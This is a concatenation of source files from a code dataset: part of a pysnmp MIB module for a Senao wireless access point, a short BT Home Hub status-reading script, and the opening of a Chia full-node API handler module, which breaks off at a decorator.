entNDataRate = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 8), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entNDataRate.setStatus('mandatory')
entTxPower = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 9), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTxPower.setStatus('mandatory')
entBeaconInterval = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(20, 1024))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entBeaconInterval.setStatus('mandatory')
entDTIMPeriod = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entDTIMPeriod.setStatus('mandatory')
entFragmentationThreshold = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(256, 2346))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entFragmentationThreshold.setStatus('mandatory')
entRTSThreshold = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2347))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRTSThreshold.setStatus('mandatory')
entChannelBandwidth = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entChannelBandwidth.setStatus('mandatory')
entPreambleType = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("short", 1), ("long", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entPreambleType.setStatus('mandatory')
entCTSProtection = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 5, 1, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("auto", 0), ("always", 1), ("none", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCTSProtection.setStatus('mandatory')
entWlanESSIDInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2), )
if mibBuilder.loadTexts: entWlanESSIDInfoTable.setStatus('current')
entWlanESSIDInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entWlanESSIDInfoIndex"))
if mibBuilder.loadTexts: entWlanESSIDInfoEntry.setStatus('current')
entWlanESSIDInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entWlanESSIDInfoIndex.setStatus('current')
entESSID = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entESSID.setStatus('current')
entBroadcastESSID = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 3), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entBroadcastESSID.setStatus('mandatory')
entWMM = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 4), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWMM.setStatus('mandatory')
entEncryption = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 4))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entEncryption.setStatus('current')
entWlanAuthenticationType = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanAuthenticationType.setStatus('current')
entWlanWepInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3), )
if mibBuilder.loadTexts: entWlanWepInfoTable.setStatus('current')
entWlanWepInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entWlanESSIDIndex"))
if mibBuilder.loadTexts: entWlanWepInfoEntry.setStatus('current')
entWlanESSIDIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entWlanESSIDIndex.setStatus('current')
entWlanWepKeyID = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKeyID.setStatus('current')
entWlanWepKey1Value = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 3), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKey1Value.setStatus('current')
entWlanWepKey2Value = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 4), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKey2Value.setStatus('current')
entWlanWepKey3Value = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 5), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKey3Value.setStatus('current')
entWlanWepKey4Value = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 3, 1, 6), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlanWepKey4Value.setStatus('current')
entWlanWPAInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 4), )
if mibBuilder.loadTexts: entWlanWPAInfoTable.setStatus('current')
entWlanWPAInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 4, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entWlanWPAESSIDIndex"))
if mibBuilder.loadTexts: entWlanWPAInfoEntry.setStatus('current')
entWlanWPAESSIDIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 4, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entWlanWPAESSIDIndex.setStatus('current')
entPresharedKey = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 4, 1, 2), DisplayString()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entPresharedKey.setStatus('current')
ent802dot1xInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5), )
if mibBuilder.loadTexts: ent802dot1xInfoTable.setStatus('current')
ent802dot1xInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entWlan802dot1xESSIDIndex"))
if mibBuilder.loadTexts: ent802dot1xInfoEntry.setStatus('current')
entWlan802dot1xESSIDIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entWlan802dot1xESSIDIndex.setStatus('current')
entRADIUSServerIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRADIUSServerIPAddress.setStatus('current')
entRADIUSServerPort = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entRADIUSServerPort.setStatus('current')
entRADIUSServerPassword = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 4), DisplayString()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: entRADIUSServerPassword.setStatus('current')
entWlan802dot1xEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 5, 1, 5), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entWlan802dot1xEnable.setStatus('current')
entWlanClientListInfoTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6), )
if mibBuilder.loadTexts: entWlanClientListInfoTable.setStatus('current')
entWlanClientListInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entCLInfoIndex"))
if mibBuilder.loadTexts: entWlanClientListInfoEntry.setStatus('current')
entCLInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entCLInfoIndex.setStatus('current')
entCLInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 2), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLInterface.setStatus('current')
entCLMAC = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 3), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLMAC.setStatus('current')
entCLRx = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 4), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLRx.setStatus('current')
entCLTx = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 5), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLTx.setStatus('current')
entCLSignal = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 6), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLSignal.setStatus('current')
entCLConnectedTime = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 7), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLConnectedTime.setStatus('current')
entCLIdleTime = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 5, 6, 1, 8), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entCLIdleTime.setStatus('current')
entSNMPStatus = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entSNMPStatus.setStatus('mandatory')
entSNMPVerType = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("all", 0), ("v1", 1), ("v2c", 2), ("v3", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entSNMPVerType.setStatus('mandatory')
entSNMPCommunityTable = MibTable((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3), )
if mibBuilder.loadTexts: entSNMPCommunityTable.setStatus('current')
entSNMPCommunityEntry = MibTableRow((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1), ).setIndexNames((0, "SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "entSNMPCommunityIndex"))
if mibBuilder.loadTexts: entSNMPCommunityEntry.setStatus('current')
entSNMPCommunityIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSNMPCommunityIndex.setStatus('current')
entSNMPCommunityName = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entSNMPCommunityName.setStatus('current')
entSNMPCommunityType = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("read", 1), ("write", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSNMPCommunityType.setStatus('current')
entSNMPCommunityValid = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1, 4), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSNMPCommunityValid.setStatus('current')
entSNMPTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4))
entTrapStatus = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTrapStatus.setStatus('mandatory')
entTrapVer = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("all", 0), ("v1", 1), ("v2c", 2), ("v3", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTrapVer.setStatus('mandatory')
entTrapReceiverIPAddress = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4, 3), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTrapReceiverIPAddress.setStatus('mandatory')
entTrapReceiverCommunityName = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTrapReceiverCommunityName.setStatus('mandatory')
entTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 20))
entSystemTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 20, 1))
entWanTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 20, 2))
entSystemTrapsReboot = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 1, 1))
if mibBuilder.loadTexts: entSystemTrapsReboot.setStatus('current')
entSystemTrapsRestoreToDefault = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 1, 2))
if mibBuilder.loadTexts: entSystemTrapsRestoreToDefault.setStatus('current')
entSystemTrapsReloadModules = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 1, 3))
if mibBuilder.loadTexts: entSystemTrapsReloadModules.setStatus('current')
entWanTrapsLinkDisconnect = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 2, 1)).setObjects(("SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "ifIndex"))
if mibBuilder.loadTexts: entWanTrapsLinkDisconnect.setStatus('current')
entWanTrapsLinkRecover = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 2, 2)).setObjects(("SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "ifIndex"))
if mibBuilder.loadTexts: entWanTrapsLinkRecover.setStatus('current')
mibBuilder.exportSymbols("SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", entIPLeaseTime=entIPLeaseTime, entWlanWepKey3Value=entWlanWepKey3Value, entKenelVersion=entKenelVersion, entMacFilteringValid=entMacFilteringValid, entSystemTraps=entSystemTraps, entWlanESSIDInfoIndex=entWlanESSIDInfoIndex, entSNMPCommunityEntry=entSNMPCommunityEntry, entRouterEnable=entRouterEnable, entWlanESSIDInfoEntry=entWlanESSIDInfoEntry, entResetToDefault=entResetToDefault, entMacAddress=entMacAddress, entWlanClientListInfoTable=entWlanClientListInfoTable, entLanMacFilteringEnable=entLanMacFilteringEnable, entBeaconInterval=entBeaconInterval, entWanTrapsLinkDisconnect=entWanTrapsLinkDisconnect, ent802dot1xInfoTable=ent802dot1xInfoTable, entApplyModules=entApplyModules, entCLRx=entCLRx, entTraps=entTraps, entIPPoolEnd=entIPPoolEnd, entRadio=entRadio, entWlanAuthenticationType=entWlanAuthenticationType, entAPMode=entAPMode, entSNMPCommunityName=entSNMPCommunityName, entRADIUSServerPort=entRADIUSServerPort, entSNMPCommunityTable=entSNMPCommunityTable, entLanMacFilterEntry=entLanMacFilterEntry, entLanMacFilterTable=entLanMacFilterTable, indoorWirelessDevice=indoorWirelessDevice, entFragmentationThreshold=entFragmentationThreshold, entWanTrapsLinkRecover=entWanTrapsLinkRecover, entCLInterface=entCLInterface, entTrapReceiverCommunityName=entTrapReceiverCommunityName, entWlanWepKeyID=entWlanWepKeyID, entSNMPCommunityValid=entSNMPCommunityValid, entWlanCommonInfo=entWlanCommonInfo, entReset=entReset, entTxPower=entTxPower, entWlanClientListInfoEntry=entWlanClientListInfoEntry, entTrapVer=entTrapVer, entWlanWepInfoTable=entWlanWepInfoTable, entCLIdleTime=entCLIdleTime, senao=senao, entWAN=entWAN, entLanMacFilteringMode=entLanMacFilteringMode, entChannelBandwidth=entChannelBandwidth, ent802dot1xInfoEntry=ent802dot1xInfoEntry, PYSNMP_MODULE_ID=senao, entHwVersion=entHwVersion, entWlanWPAInfoTable=entWlanWPAInfoTable, entCLMAC=entCLMAC, entWMM=entWMM, entSystemTrapsReloadModules=entSystemTrapsReloadModules, entWlan802dot1xEnable=entWlan802dot1xEnable, entWlanWepKey4Value=entWlanWepKey4Value, entSystemTrapsReboot=entSystemTrapsReboot, entAppVersion=entAppVersion, entSystemTrapsRestoreToDefault=entSystemTrapsRestoreToDefault, entTrapReceiverIPAddress=entTrapReceiverIPAddress, entWlan802dot1xESSIDIndex=entWlan802dot1xESSIDIndex, entWlanWepInfoEntry=entWlanWepInfoEntry, entBroadcastESSID=entBroadcastESSID, entOpMode=entOpMode, entSysUpTime=entSysUpTime, entSysModel=entSysModel, entESSID=entESSID, entCLInfoIndex=entCLInfoIndex, entCTSProtection=entCTSProtection, entPreambleType=entPreambleType, entWlanWepKey2Value=entWlanWepKey2Value, entSN=entSN, entWlanWepKey1Value=entWlanWepKey1Value, entRADIUSServerPassword=entRADIUSServerPassword, entSystem=entSystem, entMacFilter=entMacFilter, entPassword=entPassword, entIPPoolStart=entIPPoolStart, entRTSThreshold=entRTSThreshold, entWlan=entWlan, entSNMPVerType=entSNMPVerType, entChannel=entChannel, entCLSignal=entCLSignal, entDHCPEnable=entDHCPEnable, entSTPEnable=entSTPEnable, entWlanWPAESSIDIndex=entWlanWPAESSIDIndex, entTrapStatus=entTrapStatus, entRADIUSServerIPAddress=entRADIUSServerIPAddress, entWlanESSIDInfoTable=entWlanESSIDInfoTable, entSNMPTrap=entSNMPTrap, entSNMPStatus=entSNMPStatus, entSNMP=entSNMP, entWlanWPAInfoEntry=entWlanWPAInfoEntry, entLANIP=entLANIP, entBand=entBand, entPresharedKey=entPresharedKey, entDataRate=entDataRate, entNDataRate=entNDataRate, entCLTx=entCLTx, entLANSubnetMask=entLANSubnetMask, entWlanESSIDIndex=entWlanESSIDIndex, entSysMode=entSysMode, entLAN=entLAN, 
entEncryption=entEncryption, entSNMPCommunityIndex=entSNMPCommunityIndex, entSNMPCommunityType=entSNMPCommunityType, entMacAddressIndex=entMacAddressIndex, entDTIMPeriod=entDTIMPeriod, entWanTraps=entWanTraps, entESSIDNum=entESSIDNum, entCLConnectedTime=entCLConnectedTime)
| 119.018018 | 3,826 | 0.756983 | [
"Apache-2.0"
] | agustinhenze/mibs.snmplabs.com | pysnmp/SENAO-ENTERPRISE-INDOOR-AP-CB-MIB.py | 26,422 | Python |
import bthomehub
client = bthomehub.BtHomeClient('192.168.0.254')
client.authenticate()
values = client.get_values()
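# get_values() returns the hub's status parameters keyed by parameter path; the lookups below pick out DSL sync rates, uptime, and WAN traffic counters.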
print('DownstreamRate = ' + str(float(values["Device/DSL/Channels/Channel[@uid='1']/DownstreamCurrRate"]) / 1000))
print('UpstreamRate = ' + str(float(values["Device/DSL/Channels/Channel[@uid='1']/UpstreamCurrRate"]) / 1000))
print('System UpTime = ' + str(values["Device/DeviceInfo/UpTime"]))
print('BytesSent = ' + str(float(values["Device/IP/Interfaces/Interface[@uid='3']/Stats/BytesSent"]) / 1000000))
print('BytesRecieved = ' + str(float(values["Device/IP/Interfaces/Interface[@uid='3']/Stats/BytesReceived"]) / 1000000))
print('Network UpTime = ' + str(values["Device/IP/Interfaces/Interface[@uid='3']/LastChange"]))
| 46.625 | 120 | 0.72118 | ["Unlicense"] | abaitken/bthomehub_client | example.py | 746 | Python
import asyncio
import dataclasses
import time
import traceback
from secrets import token_bytes
from typing import Dict, List, Optional, Tuple, Set
from blspy import AugSchemeMPL, G2Element
from chiabip158 import PyBIP158
import chia.server.ws_connection as ws
from chia.consensus.block_creation import create_unfinished_block
from chia.consensus.block_record import BlockRecord
from chia.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from chia.full_node.bundle_tools import best_solution_generator_from_template, simple_solution_generator
from chia.full_node.full_node import FullNode
from chia.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from chia.full_node.signage_point import SignagePoint
from chia.protocols import farmer_protocol, full_node_protocol, introducer_protocol, timelord_protocol, wallet_protocol
from chia.protocols.full_node_protocol import RejectBlock, RejectBlocks
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.protocols.wallet_protocol import (
PuzzleSolutionResponse,
RejectHeaderBlocks,
RejectHeaderRequest,
CoinState,
RespondSESInfo,
)
from chia.server.outbound_message import Message, make_msg
from chia.types.blockchain_format.coin import Coin, hash_coin_list
from chia.types.blockchain_format.pool_target import PoolTarget
from chia.types.blockchain_format.program import Program
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from chia.types.coin_record import CoinRecord
from chia.types.end_of_slot_bundle import EndOfSubSlotBundle
from chia.types.full_block import FullBlock
from chia.types.generator_types import BlockGenerator
from chia.types.mempool_inclusion_status import MempoolInclusionStatus
from chia.types.mempool_item import MempoolItem
from chia.types.peer_info import PeerInfo
from chia.types.transaction_queue_entry import TransactionQueueEntry
from chia.types.unfinished_block import UnfinishedBlock
from chia.util.api_decorators import api_request, peer_required, bytes_required, execute_task, reply_type
from chia.util.generator_tools import get_block_header
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint32, uint64, uint128
from chia.util.merkle_set import MerkleSet
class FullNodeAPI:
full_node: FullNode
def __init__(self, full_node) -> None:
self.full_node = full_node
@property
def server(self):
return self.full_node.server
@property
def log(self):
return self.full_node.log
@property
def api_ready(self):
return self.full_node.initialized
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_peers])
async def request_peers(self, _request: full_node_protocol.RequestPeers, peer: ws.WSChiaConnection):
if peer.peer_server_port is None:
return None
peer_info = PeerInfo(peer.peer_host, peer.peer_server_port)
if self.full_node.full_node_peers is not None:
msg = await self.full_node.full_node_peers.request_peers(peer_info)
return msg
@peer_required
@api_request
async def respond_peers(
self, request: full_node_protocol.RespondPeers, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), True)
return None
@peer_required
@api_request
async def respond_peers_introducer(
self, request: introducer_protocol.RespondPeersIntroducer, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers from introducer")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), False)
await peer.close()
return None
@execute_task
@peer_required
@api_request
async def new_peak(self, request: full_node_protocol.NewPeak, peer: ws.WSChiaConnection) -> Optional[Message]:
"""
A peer notifies us that they have added a new peak to their blockchain. If we don't have it,
we can ask for it.
"""
# this semaphore limits the number of tasks that can call new_peak() at
# the same time, since it can be expensive
waiter_count = len(self.full_node.new_peak_sem._waiters)
if waiter_count > 0:
self.full_node.log.debug(f"new_peak Waiters: {waiter_count}")
if waiter_count > 20:
return None
async with self.full_node.new_peak_sem:
return await self.full_node.new_peak(request, peer)
@peer_required
@api_request
async def new_transaction(
self, transaction: full_node_protocol.NewTransaction, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
A peer notifies us of a new transaction.
Requests a full transaction if we haven't seen it previously, and if the fees are enough.
"""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if not (await self.full_node.synced()):
return None
# Ignore if already seen
if self.full_node.mempool_manager.seen(transaction.transaction_id):
return None
if self.full_node.mempool_manager.is_fee_enough(transaction.fees, transaction.cost):
            # If there's a current pending request, just add this peer to the set of peers that have this tx
if transaction.transaction_id in self.full_node.full_node_store.pending_tx_request:
if transaction.transaction_id in self.full_node.full_node_store.peers_with_tx:
current_set = self.full_node.full_node_store.peers_with_tx[transaction.transaction_id]
if peer.peer_node_id in current_set:
return None
current_set.add(peer.peer_node_id)
return None
else:
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
return None
self.full_node.full_node_store.pending_tx_request[transaction.transaction_id] = peer.peer_node_id
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
async def tx_request_and_timeout(full_node: FullNode, transaction_id, task_id):
counter = 0
try:
while True:
                        # Limit to asking a few peers; it's possible that this tx got included on chain already
# Highly unlikely that the peers that advertised a tx don't respond to a request. Also, if we
# drop some transactions, we don't want to refetch too many times
if counter == 5:
break
if transaction_id not in full_node.full_node_store.peers_with_tx:
break
peers_with_tx: Set = full_node.full_node_store.peers_with_tx[transaction_id]
if len(peers_with_tx) == 0:
break
peer_id = peers_with_tx.pop()
assert full_node.server is not None
if peer_id not in full_node.server.all_connections:
continue
peer = full_node.server.all_connections[peer_id]
request_tx = full_node_protocol.RequestTransaction(transaction.transaction_id)
msg = make_msg(ProtocolMessageTypes.request_transaction, request_tx)
await peer.send_message(msg)
await asyncio.sleep(5)
counter += 1
if full_node.mempool_manager.seen(transaction_id):
break
except asyncio.CancelledError:
pass
finally:
# Always Cleanup
if transaction_id in full_node.full_node_store.peers_with_tx:
full_node.full_node_store.peers_with_tx.pop(transaction_id)
if transaction_id in full_node.full_node_store.pending_tx_request:
full_node.full_node_store.pending_tx_request.pop(transaction_id)
if task_id in full_node.full_node_store.tx_fetch_tasks:
full_node.full_node_store.tx_fetch_tasks.pop(task_id)
task_id: bytes32 = bytes32(token_bytes(32))
fetch_task = asyncio.create_task(
tx_request_and_timeout(self.full_node, transaction.transaction_id, task_id)
)
self.full_node.full_node_store.tx_fetch_tasks[task_id] = fetch_task
return None
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_transaction])
async def request_transaction(self, request: full_node_protocol.RequestTransaction) -> Optional[Message]:
"""Peer has requested a full transaction from us."""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
spend_bundle = self.full_node.mempool_manager.get_spendbundle(request.transaction_id)
if spend_bundle is None:
return None
transaction = full_node_protocol.RespondTransaction(spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
return msg
@peer_required
@api_request
@bytes_required
async def respond_transaction(
self,
tx: full_node_protocol.RespondTransaction,
peer: ws.WSChiaConnection,
tx_bytes: bytes = b"",
test: bool = False,
) -> Optional[Message]:
"""
Receives a full transaction from peer.
If tx is added to mempool, send tx_id to others. (new_transaction)
"""
assert tx_bytes != b""
spend_name = std_hash(tx_bytes)
if spend_name in self.full_node.full_node_store.pending_tx_request:
self.full_node.full_node_store.pending_tx_request.pop(spend_name)
if spend_name in self.full_node.full_node_store.peers_with_tx:
self.full_node.full_node_store.peers_with_tx.pop(spend_name)
if self.full_node.transaction_queue.qsize() % 100 == 0 and not self.full_node.transaction_queue.empty():
self.full_node.log.debug(f"respond_transaction Waiters: {self.full_node.transaction_queue.qsize()}")
if self.full_node.transaction_queue.full():
self.full_node.dropped_tx.add(spend_name)
return None
# Higher fee means priority is a smaller number, which means it will be handled earlier
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(tx.transaction, tx_bytes, spend_name, peer, test))
)
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_proof_of_weight])
async def request_proof_of_weight(self, request: full_node_protocol.RequestProofOfWeight) -> Optional[Message]:
if self.full_node.weight_proof_handler is None:
return None
if not self.full_node.blockchain.contains_block(request.tip):
self.log.error(f"got weight proof request for unknown peak {request.tip}")
return None
if request.tip in self.full_node.pow_creation:
event = self.full_node.pow_creation[request.tip]
await event.wait()
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
else:
event = asyncio.Event()
self.full_node.pow_creation[request.tip] = event
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
event.set()
tips = list(self.full_node.pow_creation.keys())
if len(tips) > 4:
# Remove old from cache
for i in range(0, 4):
self.full_node.pow_creation.pop(tips[i])
if wp is None:
self.log.error(f"failed creating weight proof for peak {request.tip}")
return None
# Serialization of wp is slow
if (
self.full_node.full_node_store.serialized_wp_message_tip is not None
and self.full_node.full_node_store.serialized_wp_message_tip == request.tip
):
return self.full_node.full_node_store.serialized_wp_message
message = make_msg(
ProtocolMessageTypes.respond_proof_of_weight, full_node_protocol.RespondProofOfWeight(wp, request.tip)
)
self.full_node.full_node_store.serialized_wp_message_tip = request.tip
self.full_node.full_node_store.serialized_wp_message = message
return message
@api_request
async def respond_proof_of_weight(self, request: full_node_protocol.RespondProofOfWeight) -> Optional[Message]:
self.log.warning("Received proof of weight too late.")
return None
@api_request
